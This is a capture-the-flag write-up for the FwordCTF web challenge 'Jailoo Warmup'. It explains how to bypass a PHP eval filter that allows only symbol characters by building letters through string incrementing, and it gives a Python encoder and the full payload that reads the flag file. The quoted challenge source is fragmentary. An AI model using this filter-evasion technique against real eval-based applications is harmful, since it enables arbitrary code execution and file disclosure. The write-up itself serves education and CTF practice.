Rating: 3.3

# Jailoo Warmup

## Description

- Category: web
- Points: 442/500
- Solved by: drw0if, 0xThorn

## Writeup

As said in the challenge description, the objective is to get the content of `FLAG.PHP`


The website is very simple: it only contains a textbox and a submit button.

First we have a look at the provided source code:

Command executed !</div>";
} else {
die("<div class=\"error\">NOT ALLOWED !</div>");
} else {
die("<div class=\"error\">NOT ALLOWED !</div>");
} else if ($_SERVER['REQUEST_METHOD'] != "GET") {
die("<div class=\"error\">NOT ALLOWED !</div>");

As seen in the source code, the text inserted in the textbox will be executed with an `eval`, but only if it contains `$()_[]=;+".`, because of the regex.

After some research on google, it seems that you can create code without using letters. The strategy is to assign a letter to a variable and then increase its value to get all the letters. Then by concatenating them it is possibile to write anything.

The first problem is how to get a letter, preferably `A`.

$_=[]; // Create an array
$_="$_"; // $_ = Array
$_=$_["."+"."]; // $_ = $_[0] (because "."+"." returns an error) = A

From now on it is easy to get any letter. For example if we need a C we can do:

$__=$_; // A
$__++;$__++; //C (A increased two times)

Now it comes the tricky part: writing an exploit. Writing all the code by hand is slow, so we wrote a script that can encrypt the strings we want.

def encodeString(payload, variableName): # Payload is the string to be encoded, the variableName is generally '___' (a certain number of underscores)
payload = payload.upper()

ans = '$' + variableName + '="";' # Initializes the variable

for c in payload:
if c in '$()_[]=;+.': # If it is an allowed character it just concatenates it
ans += '$' + variableName + '.="' + c + '";'

else: # Otherwise it creates the letter starting from the 'A'
offset = ord(c) - ord('A')
ans += '$__=$_;'
ans += '$__++;' * offset
ans += '$' + variableName + '.=$__;'

return ans

Finally comes the part that took the most time away: choosing the function to be called. After some struggle with `print`, `echo` and `file_get_contents`, the best solution turned to be `readfile('FILE.PHP');`

Putting it all together, to obtain a working code we had to init a variable with `A`, create two variables for `readfile` and `file.php` and then put them together with something like `$___($_____);`. The final code of the script is in this repository.

The result is this mess: `$_=[];$_="$_";$_=$_["."+"."];$___="";$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$___.=$__;$__=$_;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$_____="";$__=$_;$__++;$__++;$__++;$__++;$__++;$_____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$_____.=$__;$__=$_;$_____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$_____.=$__;$_____.=".";$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$_____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$_____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$_____.=$__;$___($_____);`

By pasting that string in the textbox and pressing execute, we were able to fing the flag in the page code.


Original writeup (https://github.com/r00tstici/writeups/tree/master/fwordCTF/jailoo_warmup).